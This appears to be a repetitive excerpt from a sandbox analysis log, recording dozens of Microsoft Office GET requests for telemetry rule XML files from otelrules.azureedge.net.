          Source: global trafficHTTP traffic detected: GET /rules/rule120652v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120653v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120654v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120655v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120656v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120658v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120657v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120659v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120663v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120661v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120662v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120664v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120665v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120667v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120666v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120668v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120670v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120669v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120671v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120672v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120673v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120676v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120674v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120675v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120660v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120680v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120678v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120679v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120677v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120681v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120682v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule224901v11s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120602v10s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule120601v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700401v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700400v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703901v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703501v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703351v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703350v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703500v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703401v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703400v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703601v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703600v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703851v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703850v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703801v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703800v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703701v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703700v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703751v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule703750v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule704051v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule704050v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule701700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule702050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
          Source: global trafficHTTP traffic detected: GET /rules/rule700701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
